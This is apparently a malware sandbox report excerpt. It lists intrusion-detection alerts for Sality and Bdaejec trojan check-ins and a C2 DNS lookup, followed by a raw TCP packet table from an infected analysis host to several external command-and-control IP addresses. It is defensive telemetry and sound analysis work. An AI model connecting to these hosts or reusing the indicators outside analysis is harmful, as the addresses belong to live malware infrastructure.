                                  07/05/24-08:01:59.943341TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979380192.168.2.978.46.2.155
                                  07/05/24-08:00:56.772122TCP2807908ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin49706799192.168.2.944.221.84.105
                                  07/05/24-08:02:18.242450TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981780192.168.2.944.221.84.105
                                  07/05/24-08:00:56.566151UDP2838522ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6465053192.168.2.91.1.1.1
                                  07/05/24-08:02:12.970119TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981080192.168.2.954.244.188.177
                                  07/05/24-08:01:04.022066TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971580192.168.2.954.244.188.177
                                  07/05/24-08:02:03.152790TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979780192.168.2.944.221.84.105
                                  07/05/24-08:01:47.290355TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977580192.168.2.944.221.84.105
                                  07/05/24-08:01:16.152288TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973480192.168.2.944.221.84.105
                                  07/05/24-08:01:20.999936TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974080192.168.2.944.221.84.105
                                  07/05/24-08:02:22.866675TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982380192.168.2.944.221.84.105
                                  07/05/24-08:02:32.227759TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983580192.168.2.937.230.104.89
                                  07/05/24-08:01:29.573817TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975280192.168.2.937.230.104.89
                                  07/05/24-08:02:14.792678TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981380192.168.2.978.46.2.155
                                  07/05/24-08:01:56.506243TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978980192.168.2.937.230.104.89
                                  07/05/24-08:02:43.122012TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984980192.168.2.978.46.2.155
                                  07/05/24-08:04:12.187330TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997080192.168.2.937.230.104.89
                                  07/05/24-08:01:31.881537TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975580192.168.2.944.221.84.105
                                  07/05/24-08:02:46.468983TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985380192.168.2.944.221.84.105
                                  07/05/24-08:01:17.914842TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973680192.168.2.978.46.2.155
                                  07/05/24-08:02:31.349246TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983480192.168.2.978.46.2.155
                                  07/05/24-08:02:10.546095TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980780192.168.2.944.221.84.105
                                  07/05/24-08:02:56.645638TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986780192.168.2.978.46.2.155
                                  07/05/24-08:01:44.740868TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977280192.168.2.978.46.2.155
                                  07/05/24-08:04:37.226377TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000480192.168.2.944.221.84.105
                                  07/05/24-08:03:21.234782TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990080192.168.2.954.244.188.177
                                  07/05/24-08:03:00.275363TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987180192.168.2.944.221.84.105
                                  07/05/24-08:04:50.302773TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002280192.168.2.944.221.84.105
                                  07/05/24-08:01:07.791091TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972280192.168.2.954.244.188.177
                                  07/05/24-08:01:58.613467TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979180192.168.2.944.221.84.105
                                  07/05/24-08:03:58.540036TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995280192.168.2.937.230.104.89
                                  07/05/24-08:01:05.352632TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971980192.168.2.944.221.84.105
                                  07/05/24-08:03:45.815743TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993480192.168.2.937.230.104.89
                                  07/05/24-08:04:03.001623TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995780192.168.2.978.46.2.155
                                  07/05/24-08:02:53.166032TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986280192.168.2.937.230.104.89
                                  07/05/24-08:02:38.741816TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984380192.168.2.944.221.84.105
                                  07/05/24-08:03:10.370214TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988580192.168.2.978.46.2.155
                                  07/05/24-08:03:48.869334TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993880192.168.2.944.221.84.105
                                  07/05/24-08:01:39.564643TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976580192.168.2.944.221.84.105
                                  07/05/24-08:01:13.080098TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973080192.168.2.944.221.84.105
                                  07/05/24-08:03:49.406963TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993980192.168.2.978.46.2.155
                                  07/05/24-08:04:02.183154TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995680192.168.2.944.221.84.105
                                  07/05/24-08:04:06.146884TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996180192.168.2.944.221.84.105
                                  07/05/24-08:04:22.519683TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998480192.168.2.954.244.188.177
                                  07/05/24-08:03:06.776659TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988080192.168.2.937.230.104.89
                                  07/05/24-08:03:18.335947TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989680192.168.2.944.221.84.105
                                  07/05/24-08:04:15.590938TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997580192.168.2.978.46.2.155
                                  07/05/24-08:04:09.581772TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996680192.168.2.954.244.188.177
                                  07/05/24-08:03:56.042930TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994880192.168.2.954.244.188.177
                                  07/05/24-08:02:06.807493TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980280192.168.2.944.221.84.105
                                  07/05/24-08:01:52.887573TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978480192.168.2.937.230.104.89
                                  07/05/24-08:03:12.789479TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988880192.168.2.954.244.188.177
                                  07/05/24-08:04:28.559508TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999380192.168.2.978.46.2.155
                                  07/05/24-08:02:35.314816TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983980192.168.2.978.46.2.155
                                  07/05/24-08:03:05.551264TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987880192.168.2.944.221.84.105
                                  07/05/24-08:04:47.376297TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001880192.168.2.937.230.104.89
                                  07/05/24-08:02:25.987014TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982780192.168.2.944.221.84.105
                                  07/05/24-08:01:48.377470TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977780192.168.2.978.46.2.155
                                  07/05/24-08:02:11.167101TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980880192.168.2.978.46.2.155
                                  07/05/24-08:01:12.546374TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972980192.168.2.944.221.84.105
                                  07/05/24-08:02:02.576487TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979680192.168.2.944.221.84.105
                                  07/05/24-08:04:15.074571TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997480192.168.2.944.221.84.105
                                  07/05/24-08:03:04.108659TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987680192.168.2.954.244.188.177
                                  07/05/24-08:02:05.518067TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980080192.168.2.954.244.188.177
                                  07/05/24-08:02:42.573580TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984880192.168.2.944.221.84.105
                                  07/05/24-08:01:28.356615TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975080192.168.2.944.221.84.105
                                  07/05/24-08:02:00.629569TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979480192.168.2.937.230.104.89
                                  07/05/24-08:03:52.521010TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994380192.168.2.944.221.84.105
                                  07/05/24-08:01:13.592690TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973180192.168.2.978.46.2.155
                                  07/05/24-08:03:40.829133TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992780192.168.2.978.46.2.155
                                  07/05/24-08:03:15.362152TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989280192.168.2.937.230.104.89
                                  07/05/24-08:04:10.909966TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996880192.168.2.944.221.84.105
                                  07/05/24-08:04:30.908000TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999680192.168.2.954.244.188.177
                                  07/05/24-08:02:39.258809TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984480192.168.2.978.46.2.155
                                  07/05/24-08:01:06.642554TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972180192.168.2.937.230.104.89
                                  07/05/24-08:03:31.435892TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991380192.168.2.944.221.84.105
                                  07/05/24-08:03:27.247834TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990780192.168.2.944.221.84.105
                                  07/05/24-08:01:17.395350TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973580192.168.2.944.221.84.105
                                  07/05/24-08:02:30.739816TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983380192.168.2.944.221.84.105
                                  07/05/24-08:01:53.970856TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978580192.168.2.954.244.188.177
                                  07/05/24-08:01:11.730487TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972780192.168.2.954.244.188.177
                                  07/05/24-08:04:44.692074TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001480192.168.2.954.244.188.177
                                  07/05/24-08:04:53.907746TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002780192.168.2.944.221.84.105
                                  07/05/24-08:02:04.401245TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979980192.168.2.937.230.104.89
                                  07/05/24-08:04:49.030504TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002080192.168.2.954.244.188.177
                                  07/05/24-08:02:22.352420TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982280192.168.2.944.221.84.105
                                  07/05/24-08:04:50.812236TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002380192.168.2.978.46.2.155
                                  07/05/24-08:03:47.525990TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993680192.168.2.954.244.188.177
                                  07/05/24-08:01:28.891998TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975180192.168.2.978.46.2.155
                                  07/05/24-08:02:15.707666TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981480192.168.2.937.230.104.89
                                  07/05/24-08:01:43.526164TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977080192.168.2.944.221.84.105
                                  07/05/24-08:04:20.908103TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998280192.168.2.937.230.104.89
                                  07/05/24-08:01:27.765764TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974980192.168.2.944.221.84.105
                                  07/05/24-08:04:07.966069TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996480192.168.2.937.230.104.89
                                  07/05/24-08:02:34.792355TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983880192.168.2.944.221.84.105
                                  07/05/24-08:02:47.730064TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985580192.168.2.978.46.2.155
                                  07/05/24-08:02:41.811933TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984780192.168.2.944.221.84.105
                                  07/05/24-08:01:47.824068TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977680192.168.2.944.221.84.105
                                  07/05/24-08:00:58.522881TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24970780192.168.2.954.244.188.177
                                  07/05/24-08:02:09.128119TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980580192.168.2.954.244.188.177
                                  07/05/24-08:02:01.719700TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979580192.168.2.954.244.188.177
                                  07/05/24-08:02:55.485808TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986580192.168.2.944.221.84.105
                                  07/05/24-08:04:59.328359TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 26385480192.168.2.944.221.84.105
                                  07/05/24-08:04:14.554537TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997380192.168.2.944.221.84.105
                                  07/05/24-08:02:56.135964TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986680192.168.2.944.221.84.105
                                  07/05/24-08:02:48.516871TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985680192.168.2.937.230.104.89
                                  07/05/24-08:04:07.169793TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996380192.168.2.978.46.2.155
                                  07/05/24-08:03:53.629266TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994580192.168.2.978.46.2.155
                                  07/05/24-08:04:01.474125TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995580192.168.2.944.221.84.105
                                  07/05/24-08:02:29.271010TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983180192.168.2.954.244.188.177
                                  07/05/24-08:03:02.055632TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987480192.168.2.937.230.104.89
                                  07/05/24-08:01:40.865486TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976780192.168.2.978.46.2.155
                                  07/05/24-08:03:37.439073TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992280192.168.2.937.230.104.89
                                  07/05/24-08:01:10.581201TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972680192.168.2.937.230.104.89
                                  07/05/24-08:03:18.862590TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989780192.168.2.978.46.2.155
                                  07/05/24-08:03:36.115894TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992080192.168.2.944.221.84.105
                                  07/05/24-08:01:00.866418TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804971144.221.84.105192.168.2.9
                                  07/05/24-08:01:35.879831TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976080192.168.2.944.221.84.105
                                  07/05/24-08:03:23.798397TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990480192.168.2.937.230.104.89
                                  07/05/24-08:03:16.967869TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989480192.168.2.954.244.188.177
                                  07/05/24-08:03:27.764798TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990880192.168.2.944.221.84.105
                                  07/05/24-08:03:09.855835TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988480192.168.2.944.221.84.105
                                  07/05/24-08:03:40.317801TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992680192.168.2.944.221.84.105
                                  07/05/24-08:01:34.578408TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975880192.168.2.954.244.188.177
                                  07/05/24-08:04:00.742929TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995480192.168.2.954.244.188.177
                                  07/05/24-08:02:34.184065TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983780192.168.2.944.221.84.105
                                  07/05/24-08:01:33.065990TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975780192.168.2.937.230.104.89
                                  07/05/24-08:04:51.558103TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002480192.168.2.937.230.104.89
                                  07/05/24-08:04:23.796248TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998680192.168.2.944.221.84.105
                                  07/05/24-08:04:55.640261TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25003080192.168.2.937.230.104.89
                                  07/05/24-08:01:08.741808TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972380192.168.2.944.221.84.105
                                  07/05/24-08:04:28.048137TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999280192.168.2.944.221.84.105
                                  07/05/24-08:02:14.259539TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981280192.168.2.944.221.84.105
                                  07/05/24-08:02:09.991240TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980680192.168.2.944.221.84.105
                                  07/05/24-08:03:22.011379TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990180192.168.2.944.221.84.105
                                  07/05/24-08:01:27.008203TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974880192.168.2.954.244.188.177
                                  07/05/24-08:03:33.160392TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991680192.168.2.937.230.104.89
                                  07/05/24-08:02:03.667336TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979880192.168.2.978.46.2.155
                                  07/05/24-08:01:04.788881TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971780192.168.2.944.221.84.105
                                  07/05/24-08:04:45.455182TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001580192.168.2.944.221.84.105
                                  07/05/24-08:02:27.958118TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983080192.168.2.937.230.104.89
                                  07/05/24-08:01:24.626884TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974580192.168.2.944.221.84.105
                                  07/05/24-08:00:59.520486TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971080192.168.2.944.221.84.105
                                  07/05/24-08:02:18.766398TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981880192.168.2.978.46.2.155
                                  07/05/24-08:04:41.302467TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000980192.168.2.944.221.84.105
                                  07/05/24-08:02:23.402046TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982480192.168.2.978.46.2.155
                                  07/05/24-08:01:21.557942TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974180192.168.2.978.46.2.155
                                  07/05/24-08:04:35.628594TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000280192.168.2.954.244.188.177
                                  07/05/24-08:01:59.156855TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979280192.168.2.944.221.84.105
                                  07/05/24-08:02:21.587514TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982180192.168.2.954.244.188.177
                                  07/05/24-08:01:54.711893TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978680192.168.2.944.221.84.105
                                  07/05/24-08:04:42.388055TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001180192.168.2.978.46.2.155
                                  07/05/24-08:04:49.788119TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002180192.168.2.944.221.84.105
                                  07/05/24-08:04:37.731319TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000580192.168.2.978.46.2.155
                                  07/05/24-08:02:16.892207TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981580192.168.2.954.244.188.177
                                  07/05/24-08:02:26.526857TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982880192.168.2.944.221.84.105
                                  07/05/24-08:01:20.454312TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973980192.168.2.944.221.84.105

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 5, 2024 08:00:56.766776085 CEST49706799192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:56.771548033 CEST7994970644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:00:56.771631956 CEST49706799192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:56.772121906 CEST49706799192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:56.776920080 CEST7994970644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:00:57.168046951 CEST7994970644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:00:57.168104887 CEST7994970644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:00:57.168113947 CEST49706799192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:57.168641090 CEST49706799192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:57.171366930 CEST49706799192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:57.176090956 CEST7994970644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:00:58.505752087 CEST4970780192.168.2.954.244.188.177
                                  Jul 5, 2024 08:00:58.510606050 CEST804970754.244.188.177192.168.2.9
                                  Jul 5, 2024 08:00:58.522424936 CEST4970780192.168.2.954.244.188.177
                                  Jul 5, 2024 08:00:58.522881031 CEST4970780192.168.2.954.244.188.177
                                  Jul 5, 2024 08:00:58.528004885 CEST804970754.244.188.177192.168.2.9
                                  Jul 5, 2024 08:00:59.278147936 CEST804970754.244.188.177192.168.2.9
                                  Jul 5, 2024 08:00:59.278444052 CEST804970754.244.188.177192.168.2.9
                                  Jul 5, 2024 08:00:59.278637886 CEST4970780192.168.2.954.244.188.177
                                  Jul 5, 2024 08:00:59.307276011 CEST4970780192.168.2.954.244.188.177
                                  Jul 5, 2024 08:00:59.313081980 CEST804970754.244.188.177192.168.2.9
                                  Jul 5, 2024 08:00:59.514472961 CEST4971080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:59.519339085 CEST804971044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:00:59.520283937 CEST4971080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:59.520486116 CEST4971080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:00:59.525316000 CEST804971044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.022613049 CEST804971044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.022727013 CEST804971044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.022737026 CEST4971080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.022785902 CEST4971080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.023847103 CEST4971080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.029345989 CEST804971044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.357708931 CEST4971180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.362663031 CEST804971144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.378210068 CEST4971180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.378371954 CEST4971180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.383791924 CEST804971144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.866417885 CEST804971144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.866509914 CEST804971144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.873487949 CEST4971180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.881550074 CEST4971180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:00.886379957 CEST804971144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:00.919294119 CEST4971280192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:00.924212933 CEST804971278.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:00.929256916 CEST4971280192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:00.929388046 CEST4971280192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:00.935148001 CEST804971278.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:01.582847118 CEST804971278.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:01.588844061 CEST4971280192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:02.696749926 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:02.701633930 CEST804971437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:02.715873003 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:02.715929985 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:02.720761061 CEST804971437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:03.426892042 CEST804971437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:03.430782080 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:03.432642937 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:03.437387943 CEST804971437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:03.653867006 CEST804971437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:03.661372900 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:04.015588999 CEST4971580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:04.021413088 CEST804971554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:04.021955013 CEST4971580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:04.022066116 CEST4971580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:04.026822090 CEST804971554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:04.770015001 CEST804971554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:04.770116091 CEST804971554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:04.777793884 CEST4971580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:04.779320002 CEST4971580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:04.780967951 CEST4971780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:04.784368992 CEST804971554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:04.785881996 CEST804971744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:04.788733006 CEST4971780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:04.788881063 CEST4971780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:04.794471979 CEST804971744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.277690887 CEST804971744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.277753115 CEST4971780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.277795076 CEST804971744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.278031111 CEST4971780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.278565884 CEST4971780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.283298016 CEST804971744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.334803104 CEST4971980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.339696884 CEST804971944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.352220058 CEST4971980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.352632046 CEST4971980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.357558966 CEST804971944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.840137959 CEST804971944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.840255022 CEST804971944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.855840921 CEST4971980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.856762886 CEST4971980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:05.859765053 CEST4971280192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:05.860055923 CEST4972080192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:05.861522913 CEST804971944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:05.864881992 CEST804972078.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:05.864948988 CEST804971278.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:05.876207113 CEST4971280192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:05.876209021 CEST4972080192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:05.876739979 CEST4972080192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:05.881570101 CEST804972078.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:06.558366060 CEST804972078.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:06.561489105 CEST4972080192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:06.624556065 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:06.624823093 CEST4972180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:06.629743099 CEST804972137.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:06.630321980 CEST804971437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:06.642335892 CEST4971480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:06.642339945 CEST4972180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:06.642554045 CEST4972180192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:06.647399902 CEST804972137.230.104.89192.168.2.9
